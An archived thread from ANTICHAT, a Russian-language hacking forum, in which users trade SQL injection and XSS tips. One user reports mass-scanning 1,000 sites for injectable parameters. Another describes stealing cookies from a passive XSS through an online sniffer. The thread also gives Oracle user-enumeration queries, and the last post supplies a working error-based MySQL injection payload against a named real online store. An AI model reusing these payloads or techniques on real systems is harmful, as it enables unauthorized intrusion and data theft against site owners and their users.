ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

09.11.2014, 20:47
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 2268
Репутация:
0
|
|
Сообщение от faza02
faza02 said:
какие возможные алгоритмы для определния sqli? то, что пришло в голову:
берем уязвимый параметр, подставляем в параметр сначала id=5+and+1=1-- и сравниваем размер страницы (или diff) с первоначальной (id=5). если результат одинаковый, то id=5+and+1=2-- и также сравниваем с размером исходной страницы. ваши идеи? что делать в случае, если на странице рандомно генерируемые объекты?
С проверкой наличия SQL-injection всё очень сложно. Инъекции бывают очень разные. Многое зависит от цели - аудит типа black-box конкретного ресурса, проверка списка URL.
Во втором случае будет целесообразнее покрыть N% возможных случаев парой запросов, чем приближаться к 99% используя сотни запросов и большой анализатор.
В первом случае на хороший алгоритм нужны сотни человеко-часов. Или даже тысячи. Можете посмотреть на sqlmap - это самое популярное ПО в этой области. Однако даже оно, бывает, не может определить наличие инъекции, которую профессионал возьмет за 5 минут.
Даже если у вас будет разработка, намного превосходящая sqlmap по эффективности, вы не сможете раскрутить часть инъекций и правильно интерпретировать информацию, т.к. если бы вы могли это сделать - вы бы не задавали этот вопрос.
Для второго случая просто не изобретайте велосипед - все уже есть. Программ - множество, половина с открытыми исходными кодами. Для первого предлагаю почитать статьи по инъекциям. Разбирать инъекции, рассматривать возможные WAF. Может быть тогда вы сможете подойти к вопросу серьезно.
|
|
|

09.11.2014, 22:41
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от XAMEHA
XAMEHA said:
С проверкой наличия SQL-injection всё очень сложно. Инъекции бывают очень разные. Многое зависит от цели - аудит типа black-box конкретного ресурса, проверка списка URL.
Во втором случае будет целесообразнее покрыть N% возможных случаев парой запросов, чем приближаться к 99% используя сотни запросов и большой анализатор.
В первом случае на хороший алгоритм нужны сотни человеко-часов. Или даже тысячи. Можете посмотреть на sqlmap - это самое популярное ПО в этой области. Однако даже оно, бывает, не может определить наличие инъекции, которую профессионал возьмет за 5 минут.
Даже если у вас будет разработка, намного превосходящая sqlmap по эффективности, вы не сможете раскрутить часть инъекций и правильно интерпретировать информацию, т.к. если бы вы могли это сделать - вы бы не задавали этот вопрос.
Для второго случая просто не изобретайте велосипед - все уже есть. Программ - множество, половина с открытыми исходными кодами. Для первого предлагаю почитать статьи по инъекциям. Разбирать инъекции, рассматривать возможные WAF. Может быть тогда вы сможете подойти к вопросу серьезно.
спасибо за ответ, сделал по-своему. погрешность получилась довольно большая, из списка в 1000 сайтов после ручной проверки нашлось порядка 370+ уязвимых сайтов. скрипт ошибочно определяет на 180+ больше. делал с помощью алгоритма diff, для моих задач этого было достаточно. цель стояла определить, но не раскрутить.
P. S. все цифры приблизительны, я тоже мог много упустить, учитывая мой небольшой опыт
|
|
|

09.11.2014, 22:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 30194
Репутация:
5
|
|
Сообщение от None
спасибо за ответ, сделал по-своему. погрешность получилась довольно большая, из списка в 1000 сайтов после ручной проверки нашлось порядка 370+ уязвимых сайтов. скрипт ошибочно определяет на 180+ больше. делал с помощью алгоритма diff, для моих задач этого было достаточно. цель стояла определить, но не раскрутить.
P. S. все цифры приблизительны, я тоже мог много упустить, учитывая мой небольшой опыт
писал для себя тоже подобный чекер, вся сложность в том, что при ковычке к примеру, меняется какая-то область сайта, я делал так, +and(1=1)--+ и так несколько раз, естественно меняя 1=1, тк в странице могут быть часы, банеры и тн, которые постонно меняются! Но даже он не дал 100% результата!
|
|
|
|

10.11.2014, 00:32
|
|
Guest
Сообщений: n/a
Провел на форуме: 5283
Репутация:
0
|
|
Доброго времени суток. Нашёл на сайте пассивную XSS, зарегался. С онлайн снифера взял ссылку на картинку, составил запрос, сам перешёл по ссылке, но на снифере логов нету. Может ли быть, что браузер не даёт отправиться кукам? JavaScript включён.
|
|
|
|

10.11.2014, 19:00
|
|
Guest
Сообщений: n/a
Провел на форуме: 2764
Репутация:
0
|
|
Подскажите как в Oracle вывести имена всех баз данных? типа как в mysql schema_name from schemata
|
|
|
|

10.11.2014, 19:37
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от andrxx
andrxx said:
Подскажите как в Oracle вывести имена всех баз данных? типа как в mysql schema_name from schemata
Код:
Code:
SELECT * FROM all_users;
|
|
|

10.11.2014, 19:49
|
|
Guest
Сообщений: n/a
Провел на форуме: 2764
Репутация:
0
|
|
Сообщение от faza02
faza02 said:
Код:
Code:
SELECT * FROM all_users;
структура all_users
Сообщение от None
USERNAME USER_ID CREATED
где там названия баз посмотреть?
|
|
|
|

10.11.2014, 19:57
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от andrxx
andrxx said:
структура all_users
где там названия баз посмотреть?
username и есть имя базы.
|
|
|

11.11.2014, 03:08
|
|
Guest
Сообщений: n/a
Провел на форуме: 179197
Репутация:
25
|
|
Код HTML:
HTML:
http://www.experiencerc.com/store/index.php?cPath=10_206_207_570&limit=1180'
Можно что нибудт придумать в limit?
|
|
|
|

11.11.2014, 09:50
|
|
Guest
Сообщений: n/a
Провел на форуме: 132418
Репутация:
652
|
|
Сообщение от Br@!ns
Br@!ns said:
Код HTML:
HTML:
http://www.experiencerc.com/store/index.php?cPath=10_206_207_570&limit=1180'
Можно что нибудт придумать в limit?
www.experiencerc.com/store/index.php?cPath=10_206_207_570&limit=1180 PROCEDURE ANALYSE (0, (SELECT 3 ORDER BY (SELECT 1 from information_schema.tables group by concat((SELECT version()),floor(rand(0)*2)) having min(0))))+--+
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|